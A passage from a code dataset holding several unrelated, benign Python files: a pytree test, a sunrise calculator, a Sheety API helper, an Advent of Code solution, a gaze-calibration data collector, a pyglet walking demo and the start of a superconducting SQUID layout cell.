\"Mismatch\"):\n tree_util.tree_transpose(outer_treedef, inner_treedef, tree)\n\n def testTransposeWithCustomObject(self):\n outer_treedef = tree_util.tree_structure(FlatCache({\"a\": 1, \"b\": 2}))\n inner_treedef = tree_util.tree_structure([1, 2])\n expected = [FlatCache({\"a\": 3, \"b\": 5}), FlatCache({\"a\": 4, \"b\": 6})]\n actual = tree_util.tree_transpose(outer_treedef, inner_treedef,\n FlatCache({\"a\": [3, 4], \"b\": [5, 6]}))\n self.assertEqual(expected, actual)\n\n @parameterized.parameters([(*t, s) for t, s in zip(TREES, TREE_STRINGS)])\n def testStringRepresentation(self, tree, correct_string):\n \"\"\"Checks that the string representation of a tree works.\"\"\"\n treedef = tree_util.tree_structure(tree)\n self.assertRegex(str(treedef), correct_string)","repo_name":"shawwn/pytreez","sub_path":"tests/test_pytreez.py","file_name":"test_pytreez.py","file_ext":"py","file_size_in_byte":13975,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"3074959358","text":"from collections import Counter\n\ndef ensure_lowercase(sequence):\n '''\ntakes an input string and returns an all lower-case \nversion of the string.\n '''\n try: # try ... except\n output = sequence.lower()\n except (AttributeError, ValueError) as e:\n print(\"couldn't convert input sequence to lower case.\")\n raise\n return output\n\ndef count_letters(string):\n '''\ncount the letters in a string and print out the results. \n '''\n letter_counts = Counter(string)\n print('letter counts for', string)\n for letter, count in letter_counts.items():\n print('{}\\t{}'.format(letter, count))\n\n","repo_name":"tobyhodges/software-carpentry-sep2016","sub_path":"intro_python/seqops.py","file_name":"seqops.py","file_ext":"py","file_size_in_byte":631,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"1433852354","text":"import math\nimport datetime\n\nclass Sunlight(object):\n def __init__(self, julian_date, longitude, latitude):\n self.julian_date = julian_date\n self.longitude = longitude\n self.latitude = latitude\n \n def calc_current_julian_day(self):\n self.n = self.julian_date - 2451545.0 + 0.0008\n return self.n\n\n def calc_mean_solar_time(self):\n self.mean_solar_time = self.n - self.longitude/360\n return self.mean_solar_time\n \n def calc_solar_mean_anomaly(self):\n self.solar_mean_anomaly = (357.5291 + 0.98560028*self.mean_solar_time)%360\n return self.solar_mean_anomaly\n\n def calc_equation_of_the_center(self):\n self.equation_of_the_center = 1.9148*math.sin(math.radians(self.solar_mean_anomaly)) \\\n + 0.0200*math.sin(math.radians(2*self.solar_mean_anomaly)) \\\n + 0.0003*math.sin(math.radians(3*self.solar_mean_anomaly))\n return self.equation_of_the_center\n\n def calc_ecliptic_longitude(self):\n self.ecliptic_longitude = (self.solar_mean_anomaly + self.equation_of_the_center + 180 + 102.9372)%360\n return self.ecliptic_longitude\n\n def calc_solar_transit(self):\n self.solar_transit = 2451545.0 + self.mean_solar_time \\\n + 0.0053*math.sin(math.radians(self.solar_mean_anomaly)) \\\n - 0.0069*math.sin(math.radians(2*self.ecliptic_longitude))\n return self.solar_transit\n\n def calc_declination_of_the_sun(self):\n sin_declination_of_the_sun = math.sin(math.radians(self.ecliptic_longitude))*math.sin(math.radians(23.44))\n self.declination_of_the_sun = math.degrees(math.asin(sin_declination_of_the_sun))\n return self.declination_of_the_sun\n\n def calc_hour_angle(self):\n numerator = math.sin(math.radians(-0.83)) \\\n - math.sin(math.radians(self.latitude))*math.sin(math.radians(self.declination_of_the_sun))\n denominator = math.cos(math.radians(self.latitude))*math.cos(math.radians(self.declination_of_the_sun))\n cos_hour_angle = numerator/denominator\n self.hour_angle = math.degrees(math.acos(cos_hour_angle))\n return self.hour_angle\n\n def calc_sunrise(self):\n self.julian_date_of_sunrise = self.solar_transit - self.hour_angle/360\n return self.julian_date_of_sunrise\n\n def calc_sunset(self):\n self.julian_date_of_sunset = self.solar_transit + self.hour_angle/360\n return self.julian_date_of_sunset\n\n def run(self):\n self.calc_current_julian_day()\n self.calc_mean_solar_time()\n self.calc_solar_mean_anomaly()\n self.calc_equation_of_the_center()\n self.calc_ecliptic_longitude()\n self.calc_solar_transit()\n self.calc_declination_of_the_sun()\n self.calc_hour_angle()\n self.calc_sunrise()\n self.calc_sunset()\n return self.julian_date_of_sunrise, self.julian_date_of_sunset\n\nclass Time(object):\n def __init__(self):\n self.update()\n \n def update(self):\n self.date = datetime.datetime.now(datetime.timezone.utc)\n self.year = self.date.year\n self.month = self.date.month\n self.day = self.date.day\n self.hour = self.date.hour\n self.minute = self.date.minute\n self.second = self.date.second\n self.fix_year_and_month()\n\n def fix_year_and_month(self):\n if self.month == 1 or self.month == 2:\n self.month += 12\n self.year -= 1\n\n def julian(self):\n self.julian_date = int(365.25*self.year) \\\n + int(self.year/400) \\\n - int(self.year/100) \\\n + int(30.59*(self.month-2)) \\\n + self.day \\\n + 1721088.5 \\\n + self.hour/24 \\\n + self.minute/1440 \\\n + self.second/86400\n return self.julian_date\n\ndef main():\n julian_date = Time().julian()\n print(julian_date)\n\n sunlight = Sunlight(julian_date, 135, 34.39)\n sunlight.run()\n print(sunlight.julian_date_of_sunrise)\n print(sunlight.julian_date_of_sunset)\n\nif __name__ == \"__main__\":\n main()","repo_name":"kumagaimasahito/Pico","sub_path":"sunlight.py","file_name":"sunlight.py","file_ext":"py","file_size_in_byte":4277,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"70164388674","text":"import os\nimport requests\n\nSHEETY_ENDPOINT = os.environ.get(\"SHEETY_ENDPOINT\")\n\n\n# This class is responsible for talking to the Google sheet\nclass DataManager:\n def get_destination_data(self):\n response = requests.get(url=SHEETY_ENDPOINT)\n response.raise_for_status()\n return response.json()[\"prices\"]\n\n def update_iata_code(self, row_id, iata_code):\n body = {\n \"price\": {\n \"iataCode\": iata_code\n }\n }\n response = requests.put(f\"{SHEETY_ENDPOINT}/{row_id}\", json=body)\n response.raise_for_status()\n","repo_name":"RobertoLJr/100-days-of-python","sub_path":"day-039-project-flight-deal-finder/data_manager.py","file_name":"data_manager.py","file_ext":"py","file_size_in_byte":590,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"11750144801","text":"from pathlib import Path\r\n\r\n\r\nif __name__ == '__main__':\r\n def neighbours(a):\r\n return [(a[0] + orientation[1][di][0], a[1] + orientation[1][di][1]) for di in range(0, len(orientation[1]))]\r\n dataset = [i for i in Path('../input/input_2020_24.txt').read_text().split('\\n')]\r\n orientation = [['e', 'se', 'sw', 'w', 'nw', 'ne'], [[2, 0], [1, 1], [-1, 1], [-2, 0], [-1, -1], [1, -1]]]\r\n floor = {}\r\n for tile in range(0, len(dataset)):\r\n position = [0, 0]\r\n char = 0\r\n while char < len(dataset[tile]):\r\n if dataset[tile][char] not in ['e', 'w']:\r\n way = dataset[tile][char] + dataset[tile][char + 1]\r\n char += 2\r\n else:\r\n way = dataset[tile][char]\r\n char += 1\r\n for dim in range(0, 2):\r\n position[dim] += orientation[1][orientation[0].index(way)][dim]\r\n if (position[0], position[1]) in floor.keys():\r\n del floor[(position[0], position[1])]\r\n else:\r\n floor[(position[0], position[1])] = True\r\n print('Answer part 1 = {:d} '.format(len(floor.keys())), len(floor.keys()) == 512)\r\n for day in range(0, 100):\r\n shadow = floor.copy()\r\n for tile_1 in floor.keys():\r\n neighbours_counter = 0\r\n for tile_2 in floor.keys():\r\n neighbours_counter += (tile_2 in neighbours(tile_1))\r\n if neighbours_counter > 2 or neighbours_counter == 0:\r\n del shadow[tile_1]\r\n for tile_2 in neighbours(tile_1):\r\n if tile_2 not in floor.keys():\r\n neighbours_counter = 0\r\n for tile_3 in neighbours(tile_2):\r\n neighbours_counter += (tile_3 in floor.keys())\r\n if neighbours_counter == 2:\r\n shadow[tile_2] = True\r\n floor = shadow.copy()\r\n print(day, len(floor.keys()))\r\n print('Answer part 2 = {:d} '.format(len(floor.keys())), len(floor.keys()) == 4120)\r\n","repo_name":"osterbek/adventofcode","sub_path":"bin/2020_day_24.py","file_name":"2020_day_24.py","file_ext":"py","file_size_in_byte":2035,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"8170263209","text":"import autograd.numpy as np \nfrom autograd import grad\n\nimport matplotlib.pyplot as plt\nfig, ax = plt.subplots(1,2, figsize = [8,4])\n\nn = 20\nes = 20\nlr = .001\nups = 20\np = (2)\n# x,y = np.random.multivariate_normal(\n# \t[.5,.5],\n# \t[ [1,.9],\n# \t [.9,1] ],\n# \tn,\n# ).T\nx = np.linspace(0.01,2,n)\ny = (x * 1 + 0) ** (p)\nax[0].scatter(x,y)\n\n## Model\ndef fl(args):\n\tw,x,b,y,w2,b2,h = args\n\ty_ = ((x * w + b) + (h * w2 + b)) ** (p)\n\th = (x * w + b)\n\treturn np.sum((y - y_) ** 2)\n\ng = grad(fl)\n\n\n## Train\nw, w2, b, b2 = 0.01, .01, 0.0, .0\nh = 0.0\nn_ord = []\nfor e in range(es):\n\tfor i in range(n):\n\t\tgrads = g([w,x[i],b,y[i],w2,b2,h])\n\t\tfor u in range(ups):\n\t\t\tw -= lr * grads[0] \n\t\t\tw2 -= lr * grads[-3]\n\t\t\tb -= lr * grads[2]\n\t\t\tb2 -= lr * grads[-2]\n\tn_ord.append(fl([w,x,b,y,w2,b2,h]))\n\nax[0].plot(\n\tx,\n\t(x * w + b) ** (p)\n)\nax[1].plot(n_ord, alpha = .5, linewidth = 3)\n\n\n## Train rand\nw, w2, b, b2 = 0.01, .01, 0.0, .0\nh = 0.0\nn_rand = []\nfor e in range(es):\n\tfor i in np.random.permutation(n):\n\t\tgrads = g([w,x[i],b,y[i],w2,b2,h])\n\t\tfor u in range(ups):\n\t\t\tw -= lr * grads[0]\n\t\t\tw2 -= lr * grads[-3]\n\t\t\tb -= lr * grads[2]\n\t\t\tb2 -= lr * grads[-2]\n\tn_rand.append(fl([w,x,b,y,w2,b2,h]))\n\nax[0].plot(\n\tx,\n\t(x * w + b) ** (p)\n)\nax[1].plot(n_rand, alpha = .5, linewidth = 3)\n\n\n\n\nplt.savefig('test.png')\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"mw3i/prelims","sub_path":"Shared Explanatory Frameworks for Function Learning and Category Learning in Humans/simulations/_/mlc test/mlc rr.py","file_name":"mlc rr.py","file_ext":"py","file_size_in_byte":1307,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"10145043316","text":"import sqlite3\nconn = sqlite3.connect('test.db')\n\nsql = '''\ninsert into saram(id, name, age)\nvalues(?,?,?)\n'''\nc = conn.cursor()\nc.execute(sql, ('lee','gilsun',21))\nc.close()\n\nconn.commit()\nconn.close()","repo_name":"comstudy21joon/python","sub_path":"ch10_file_db/ch10ex13_insert_tuple.py","file_name":"ch10ex13_insert_tuple.py","file_ext":"py","file_size_in_byte":202,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"23578556437","text":"import numpy as np\nimport cv2\nimport threading\nimport datetime\nimport pickle\n\nfrom prompt_toolkit.keys import Keys\nimport gi.repository\ngi.require_version('Gdk', '3.0')\nfrom gi.repository import Gdk\n\nclass cell:\n def __init__(self):\n self.width = 170 # mm\n self.height = 230 # mm\n self.center = (0, 0)\n self.color = (0, 0, 255) # red\n self.thickness = 2\n def draw(self, image, ratio = 1):\n start_point = (int((self.center[0]-self.width/2)*ratio), int((self.center[1]-self.height/2)*ratio))\n end_point = (int((self.center[0]+self.width/2)*ratio), int((self.center[1]+self.height/2)*ratio))\n image = cv2.rectangle(image, start_point, end_point, self.color, self.thickness)\n return image\n def put_index(self, image, stridx, ratio = 1):\n FONT, FONT_SCALE, FONT_THICKNESS = cv2.FONT_HERSHEY_SIMPLEX, 1, 1\n (label_width, label_height), baseline = cv2.getTextSize(str(stridx), FONT, FONT_SCALE, FONT_THICKNESS)\n cv2.putText(image, str(stridx),(int(self.center[0]*ratio - label_width / 2),\n int(self.center[1]*ratio + label_height / 2)),\n cv2.FONT_HERSHEY_SIMPLEX, 1, (255, 255, 255), 1, cv2.LINE_AA)\n def fill(self, image, ratio):\n start_x, start_y = int((self.center[0] - self.width / 2)*ratio), int((self.center[1] - self.height / 2)*ratio)\n sor = np.ones((int(self.height*ratio), int(self.width*ratio), 3), np.uint8) * 255 # square of regard\n image[start_y:start_y + sor.shape[0], start_x:start_x + sor.shape[1]] = sor\n return image\n\nclass board:\n def __init__(self):\n self.num = 6 # 6x6 grid\n self.width = 1020 # mm\n self.height = 1380 # mm\n self.grid_cell = []\n self.cam_loc = (self.width/2, 550)#254) # location of camera on board\n for idx in range(0, self.num**2):\n cell_idx = cell()\n cell_idx.center = (cell_idx.width * (idx % self.num) + cell_idx.width / 2,\n cell_idx.height * int(idx / self.num) + cell_idx.height / 2)\n self.grid_cell.append(cell_idx)\n # initiate to display virtual board on screen with ratio\n display = Gdk.Display.get_default()\n screen = display.get_default_screen()\n default_screen = screen.get_default()\n screen_height = default_screen.get_height()\n self.create_visual(screen_height)\n\n def create_visual(self, monitor_height, ratio = 0.6): # ratio on monitor height\n h_pixels = int(ratio * monitor_height)\n w_pixels = int(ratio * monitor_height * (self.width / self.height)) # 102 / 138\n background = np.zeros((h_pixels, w_pixels, 3)) # 3channel\n ratio = (h_pixels / self.height)\n for idx in range(0, len(self.grid_cell)):\n self.grid_cell[idx].draw(background, ratio) # 1 mm = h/1380\n self.grid_cell[idx].put_index(background, idx+1, ratio)\n self.background = background\n self.ratio = ratio\n\n def visual_ror(self, idx):\n image = self.background.copy()\n cam_x = self.cam_loc[0]-self.grid_cell[idx].center[0]\n cam_y = self.grid_cell[idx].center[1]-self.cam_loc[1]\n return self.grid_cell[idx].fill(image, self.ratio), (cam_x, cam_y)\n\n def visual_ror_xy(self, x_hat, y_hat): # region of regard\n cell_x = self.cam_loc[0] - x_hat\n cell_y = self.cam_loc[1] + y_hat\n w, h = self.grid_cell[0].width, self.grid_cell[0].height\n cell_fill = int(cell_x/w) + (int(cell_y/h))*6\n\n if cell_fill < 0 or cell_fill >= self.num**2:\n img = self.background.copy()\n text = 'Out of View'\n font, font_scale, thickness = cv2.FONT_HERSHEY_SIMPLEX, 1, 1\n (label_width, label_height), baseline = cv2.getTextSize(text, font, font_scale, thickness)\n cv2.putText(img, text,(int((img.shape[1] - label_width) / 2), int((img.shape[0] - label_height) / 2)),\n font, 1, (255, 255, 255), 1, cv2.LINE_AA)\n return img, None\n return self.visual_ror(cell_fill)\n\n def visual_por_xy(self, x_hat, y_hat): # point of regard\n img, _ = self.visual_ror_xy(x_hat, y_hat)\n cell_x = int((self.cam_loc[0] - x_hat)*self.ratio)\n cell_y = int((self.cam_loc[1] + y_hat)*self.ratio)\n\n font = cv2.FONT_HERSHEY_SIMPLEX\n cv2.putText(img, '.', (cell_x, cell_y), font, 3, (58, 245, 28), 10, cv2.LINE_AA)\n\n return img\n\n def visual_por_xy_finetune(self, g_t, g_h):\n x_t, y_t = g_t\n x_hat, y_hat = g_h\n img, _ = self.visual_ror_xy(x_hat, y_hat)\n cell_x = int((self.cam_loc[0] - x_t)*self.ratio)\n cell_y = int((self.cam_loc[1] + y_t)*self.ratio)\n font = cv2.FONT_HERSHEY_SIMPLEX\n cv2.putText(img, '.', (cell_x, cell_y), font, 3, (255, 255, 255), 10, cv2.LINE_AA) # White for ground truth\n cell_x = int((self.cam_loc[0] - x_hat) * self.ratio)\n cell_y = int((self.cam_loc[1] + y_hat) * self.ratio)\n font = cv2.FONT_HERSHEY_SIMPLEX\n cv2.putText(img, '.', (cell_x, cell_y), font, 3, (58, 245, 28), 10, cv2.LINE_AA)\n\n return img\n\n def visual_gt(self, img, g_tx, g_ty): # visual ground truth\n cell_x = int((self.cam_loc[0] - g_tx)*self.ratio)\n cell_y = int((self.cam_loc[1] + g_ty)*self.ratio)\n font = cv2.FONT_HERSHEY_SIMPLEX\n cv2.putText(img, '.', (cell_x, cell_y), font, 3, (0, 0, 28), 10, cv2.LINE_AA)\n\n return img\n\n\ndef grab_img(cap):\n global THREAD_RUNNING\n global frames\n while THREAD_RUNNING:\n frame = cap.wait_for_frames(timeout_ms=10000) #_, frame = cap.read()\n frame = frame.get_color_frame()\n frame = np.asanyarray(frame.get_data())\n #frame = cv2.cvtColor(frame, cv2.COLOR_RGB2BGR)\n\n frames.append(frame)\n\ndef collect_data(cap):\n global THREAD_RUNNING\n global frames\n\n virtualboard = board()\n\n calib_data = {'frames': [], 'g_t': []}\n i = 0\n while i < virtualboard.num**2:\n # Start the sub-thread, which is responsible for grabbing images\n frames = []\n THREAD_RUNNING = True\n th = threading.Thread(target=grab_img, args=(cap,))\n th.start()\n img, g_t = virtualboard.visual_ror(i)\n cv2.imshow('image', img)\n key_press = cv2.waitKey(0)\n if key_press == 32: # space\n print(i, g_t)\n THREAD_RUNNING = False\n th.join()\n calib_data['frames'].append(frames)\n calib_data['g_t'].append(g_t)\n i += 1\n elif key_press & 0xFF == ord('q'):\n THREAD_RUNNING = False\n cv2.destroyAllWindows()\n break\n else:\n THREAD_RUNNING = False\n th.join()\n\n return calib_data\n\ndef save_dataset(data):\n name = input('Enter your name: ')\n now = datetime.datetime.now()\n subject = name + '_' + now.strftime(\"%Y-%m-%d %H.%M.%S\")\n fourcc = cv2.VideoWriter_fourcc(*'XVID')\n out = cv2.VideoWriter('%s_calib.avi' % subject, fourcc, 30.0, (1280, 720))\n target = []\n for idx in range(0, len(data['g_t'])):\n frames = data['frames'][idx]\n g_t = data['g_t'][idx]\n for i in range(len(frames) - 10, len(frames)):\n frame = frames[i]\n target.append(g_t)\n out.write(frame)\n\n out.release()\n fout = open('%s_calib_target.pkl' % subject, 'wb')\n pickle.dump(target, fout)\n fout.close()\n print('saved')\n\nif __name__ == \"__main__\":\n import pyrealsense2 as rs\n from subprocess import call\n pipe = rs.pipeline()\n config = rs.config()\n config.enable_stream(rs.stream.color, 1280, 720, rs.format.bgr8, 30)\n profile = pipe.start(config)\n cam_idx = 3\n # adjust these for your camera to get the best accuracy\n call('v4l2-ctl -d /dev/video%d -c brightness=100' % cam_idx, shell=True)\n call('v4l2-ctl -d /dev/video%d -c contrast=50' % cam_idx, shell=True)\n call('v4l2-ctl -d /dev/video%d -c sharpness=100' % cam_idx, shell=True)\n \n data = collect_data(pipe)\n if len(data['g_t']) == 36:\n save_dataset(data)\n \n pipe.stop()\n","repo_name":"linh-gist/GazeEstimationTX2","sub_path":"src/collect_dataset.py","file_name":"collect_dataset.py","file_ext":"py","file_size_in_byte":8146,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"61"} +{"seq_id":"70597649475","text":"import pyglet\nfrom pyglet.window import key\nimport math\nimport resources\n\n# Show bounding boxes\nDEBUG = False\n\nclass Game:\n ''' Main Game Object to handle overall game logic '''\n def __init__(self, window):\n self.window = window\n\n self.main_batch = pyglet.graphics.Batch()\n\n self.create_background()\n self.create_labels()\n self.hero = Hero(start_pos=(40, self.window.height-100),\n window_width=self.window.width, window_height=self.window.height,\n batch=self.main_batch)\n self.window.push_handlers(self)\n self.window.push_handlers(self.hero)\n\n self.enviornment_objs = self.create_enviornment_bounds()\n\n def create_enviornment_bounds(self):\n ''' Create bounding boxes for enviornment background '''\n objs = []\n\n hole = CollisionObject(25, 420, 60, 50, self.window.width, self.window.height)\n top_group1 = CollisionObject(155, 440, 180, 135, self.window.width, self.window.height)\n top_group1_1 = CollisionObject(185, 410, 70, 45, self.window.width, self.window.height)\n top_group2 = CollisionObject(345, 490, 100, 85, self.window.width, self.window.height)\n top_group3 = CollisionObject(415, 450, 150, 85, self.window.width, self.window.height)\n top_group4 = CollisionObject(575, 490, 60, 85, self.window.width, self.window.height)\n top_group5 = CollisionObject(635, 440, 60, 85, self.window.width, self.window.height)\n right_group1 = CollisionObject(700, 50, 60, 385, self.window.width, self.window.height)\n water1 = CollisionObject(0, 240, 535, 75, self.window.width, self.window.height)\n water2 = CollisionObject(460, 100, 75, 145, self.window.width, self.window.height)\n water3 = CollisionObject(460, 0, 75, 35, self.window.width, self.window.height)\n \n objs.append(hole)\n objs.append(top_group1)\n objs.append(top_group1_1)\n objs.append(top_group2)\n objs.append(top_group3)\n objs.append(top_group4)\n objs.append(top_group5)\n objs.append(right_group1)\n objs.append(water1)\n objs.append(water2)\n objs.append(water3)\n\n\n return objs\n\n def create_background(self):\n ''' Create sprite for the background image '''\n self.bg = pyglet.sprite.Sprite(img=resources.background_image, \n batch=self.main_batch,\n x=self.window.width//2, y=self.window.height//2)\n\n def create_labels(self):\n # labels not showing...\n self.title = pyglet.text.Label('Walking Example',\n font_name='Times New Roman',\n font_size=24,\n x=self.window.width//2, y=self.window.height-30,\n anchor_x='center', batch=self.main_batch)\n\n\n pyglet.text.Label('Move with direction keys',\n font_name='Times New Roman',\n font_size=16,\n x=20, y=self.window.height-60,\n batch=self.main_batch)\n\n pyglet.text.Label(\"Move fast with 'f' key\",\n font_name='Times New Roman',\n font_size=16,\n x=20, y=self.window.height-90,\n batch=self.main_batch)\n\n def handle_enviornment_collisions(self):\n \"\"\" Detect and handle collisions with hero and enviornment\"\"\"\n for obj in self.enviornment_objs:\n if obj.collides_with(self.hero.hit_box):\n if self.hero.is_moving_up():\n self.hero.hit_box.y -= self.hero.speed\n elif self.hero.is_moving_down():\n self.hero.hit_box.y += self.hero.speed\n elif self.hero.is_moving_left():\n self.hero.hit_box.x += self.hero.speed\n elif self.hero.is_moving_right():\n self.hero.hit_box.x -= self.hero.speed\n else:\n print(\"Unhandled Collision!\")\n\n\n def draw_env_bounds(self):\n ''' Show the environment bounds '''\n for obj in self.enviornment_objs:\n rectangle = pyglet.shapes.Rectangle(obj.x, obj.y, obj.width, obj.height, color=(0, 0, 255))\n rectangle.opacity = 150\n rectangle.draw()\n\n\n def draw(self):\n ''' Main draw method '''\n self.window.clear()\n self.bg.draw() # batch not working for drawing background... have to manually draw\n self.title.draw() # drawing labels is not working...\n self.main_batch.draw()\n\n # DEBUG\n if DEBUG:\n self.draw_env_bounds()\n\n # draw player pos dot\n rectangle = pyglet.shapes.Rectangle(self.hero.hit_box.x, self.hero.hit_box.y, self.hero.hit_box.width, self.hero.hit_box.height, color=(255, 0, 0))\n rectangle.opacity = 125\n rectangle.draw()\n\n\n def update(self, dt):\n self.hero.update(dt)\n self.handle_enviornment_collisions()\n\n def on_key_press(self, symbol, modifiers):\n pass\n\n def on_key_release(self, symbol, modifiers):\n pass\n\nclass HeroImages():\n ''' Image References for Hero Sprite '''\n def __init__(self):\n self.walk_up = pyglet.image.Animation.from_image_sequence(resources.character_seq_walk_up, duration=0.1,loop=True)\n self.walk_down = pyglet.image.Animation.from_image_sequence(resources.character_seq_walk_down, duration=0.1,loop=True)\n self.walk_left = pyglet.image.Animation.from_image_sequence(resources.character_seq_walk_left, duration=0.1,loop=True)\n self.walk_right = pyglet.image.Animation.from_image_sequence(resources.character_seq_walk_right, duration=0.1,loop=True)\n\n self.face_up = resources.character_seq_face_up\n self.face_down = resources.character_seq_face_down\n self.face_left = resources.character_seq_face_left\n self.face_right = resources.character_seq_face_right\n\nclass CollisionObject(object):\n ''' Rectangular collision object\n Used for calculating collisions between objects\n '''\n def __init__(self, x, y, width, height, window_width, window_height):\n self.x = x\n self.y = y\n self.width = width\n self.height = height\n self.window_width = window_width\n self.window_height = window_height\n self.position = (self.x, self.y)\n\n def collides_with(self, other_object):\n # rectangle collision\n x1 = self.x\n y1 = self.y\n x2 = other_object.x\n y2 = other_object.y\n\n if (x1 < x2 + other_object.width and\n x1 + self.width > x2 and\n y1 < y2 + other_object.height and\n y1 + self.height > y2):\n return True\n else:\n return False\n\n\nclass PhysicalSpriteObject(pyglet.sprite.Sprite):\n ''' A physical sprite object '''\n def __init__(self, window_width, window_height, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n self.window_width = window_width\n self.window_height = window_height\n self.velocity_x, self.velocity_y = 0.0, 0.0\n self.hit_box = CollisionObject(self.x, self.y, self.width, self.height, self.window_width, self.window_height)\n\n\nclass Hero(PhysicalSpriteObject):\n ''' Hero Sprite Class '''\n def __init__(self, start_pos=(20, 200), hero_images=HeroImages(), *args, **kwargs):\n super().__init__(img=hero_images.face_down, x=start_pos[0], y=start_pos[1], *args, **kwargs)\n self.hero_images = hero_images\n\n # adjust hit box height\n self.hit_box.height -= 55\n \n self.speed = 2\n\n self.character_keys = dict(up=False, down=False, \n left=False, right=False,\n fast=False)\n\n def is_moving_up(self):\n return self.character_keys['up']\n\n def is_moving_down(self):\n return self.character_keys['down']\n\n def is_moving_left(self):\n return self.character_keys['left']\n\n def is_moving_right(self):\n return self.character_keys['right']\n\n def update(self, dt):\n if self.character_keys['fast']:\n self.speed = 4\n else:\n self.speed = 2\n\n if self.is_moving_up():\n if self.image != self.hero_images.walk_up:\n self.image = self.hero_images.walk_up\n self.hit_box.y += self.speed\n elif self.is_moving_down():\n if self.image != self.hero_images.walk_down:\n self.image = self.hero_images.walk_down\n self.hit_box.y -= self.speed\n elif self.is_moving_left():\n if self.image != self.hero_images.walk_left:\n self.image = self.hero_images.walk_left\n self.hit_box.x -= self.speed\n elif self.is_moving_right():\n if self.image != self.hero_images.walk_right:\n self.image = self.hero_images.walk_right\n self.hit_box.x += self.speed\n else:\n # if not moving, set to still image\n if self.image == self.hero_images.walk_up:\n self.image = self.hero_images.face_up\n elif self.image == self.hero_images.walk_down:\n self.image = self.hero_images.face_down\n elif self.image == self.hero_images.walk_left:\n self.image = self.hero_images.face_left\n elif self.image == self.hero_images.walk_right:\n self.image = self.hero_images.face_right\n\n # prevent going out of border\n min_x = 0\n min_y = 0\n max_x = self.window_width\n max_y = self.window_height\n\n if self.hit_box.x < min_x:\n self.hit_box.x = min_x\n elif (self.hit_box.x+self.hit_box.width) > max_x:\n self.hit_box.x = (max_x - self.hit_box.width)\n if self.hit_box.y < min_y:\n self.hit_box.y = min_y\n elif (self.hit_box.y+self.hit_box.height) > max_y:\n self.hit_box.y = (max_y - self.hit_box.height)\n\n self.x = self.hit_box.x\n self.y = self.hit_box.y\n\n def on_key_press(self, symbol, modifiers):\n if symbol == key.UP:\n self.character_keys['up'] = True\n elif symbol == key.DOWN:\n self.character_keys['down'] = True\n elif symbol == key.LEFT:\n self.character_keys['left'] = True\n elif symbol == key.RIGHT:\n self.character_keys['right'] = True\n elif symbol == key.F:\n self.character_keys['fast'] = True\n\n def on_key_release(self, symbol, modifiers):\n if symbol == key.UP:\n self.character_keys['up'] = False\n elif symbol == key.DOWN:\n self.character_keys['down'] = False\n elif symbol == key.LEFT:\n self.character_keys['left'] = False\n elif symbol == key.RIGHT:\n self.character_keys['right'] = False\n elif symbol == key.F:\n self.character_keys['fast'] = False\n\n\nif __name__ == '__main__':\n pass\n \n#window = pyglet.window.Window(1080, 768)\nwindow = pyglet.window.Window(768, 576)\ngame = Game(window)\npyglet.clock.schedule_interval(game.update, 1/120.0)\n\n@window.event\ndef on_draw():\n game.draw()\n\npyglet.app.run()\n\n\n","repo_name":"JayMil/pyglet_games","sub_path":"intro/animation/walking-with-env.py","file_name":"walking-with-env.py","file_ext":"py","file_size_in_byte":11458,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"7605721102","text":"from math import sqrt\nfrom autologging import logged\nfrom kqcircuits.pya_resolver import pya\nfrom kqcircuits.util.parameters import Param, pdt\nfrom kqcircuits.junctions.squid import Squid\nfrom kqcircuits.util.symmetric_polygons import polygon_with_vsym\n\n\n@logged\nclass Manhattan(Squid):\n \"\"\"The PCell declaration for a Manhattan style SQUID.\n\n This SQUID has two distinct sub-types automatically selected by loop-area.\n \"\"\"\n\n finger_overshoot = Param(pdt.TypeDouble, \"Length of fingers after the junction.\", 1.0, unit=\"μm\")\n include_base_metal_gap = Param(pdt.TypeBoolean, \"Include base metal gap layer\", True)\n shadow_margin = Param(pdt.TypeDouble, \"Shadow layer margin near the the pads\", 1.0, unit=\"μm\")\n compact_geometry = Param(pdt.TypeBoolean, \"Compact geometry for metal addition.\", False)\n separate_junctions = Param(pdt.TypeBoolean, \"Junctions to separate layer\", False)\n offset_compensation = Param(pdt.TypeDouble, \"Junction lead offset from junction width\", 0, unit=\"μm\")\n mirror_offset = Param(pdt.TypeBoolean, \"Move the junction lead offset to the other lead\", False)\n finger_overlap = Param(pdt.TypeDouble, \"Length of fingers inside the pads\", 0.2, unit=\"μm\")\n single_junction = Param(pdt.TypeBoolean, \"Disable the second junction\", False)\n\n def build(self):\n self.produce_manhattan_squid(top_pad_layer=\"SIS_junction\")\n\n def produce_manhattan_squid(self, top_pad_layer):\n\n # geometry constants\n big_loop_height = 10\n loop_bottom_y = 1.5\n self.metal_gap_top_y = 20 if self.compact_geometry else 26.5\n self.width = 36 if self.compact_geometry else 38 # total width of junction layer\n self.height = 17 if self.compact_geometry else 20.2 # total height of junction layer\n bp_height = 5 # bottom pad height\n tp_width = 10 # top pad width\n brim_height = 1 # thickness of the \"top-hat's\" brim\n small_loop_height = 5.2\n small_hat_width = 2 # width of the small hat shape, in case of small loop\n\n # corner rounding parameters\n rounding_params = {\n \"rinner\": 0.5, # inner corner rounding radius\n \"router\": 0.5, # outer corner rounding radius\n \"n\": 64, # number of point per rounded corner\n }\n\n # convenience variables\n delta_j = self.loop_area / big_loop_height # junction distance, a.k.a. loop width\n tp_height = self.height - loop_bottom_y - big_loop_height # top pad height\n bp_gap_x = -self.width / 2 + (self.width - delta_j) / 2 # bottom gap left edge x-coordinate\n bp_gap_x_min = -self.width / 2 + 7 # fixed at minimum size\n finger_margin = brim_height # make hats brim this much wider for good finger connection\n\n # adjust for small loop geometry\n small_loop = 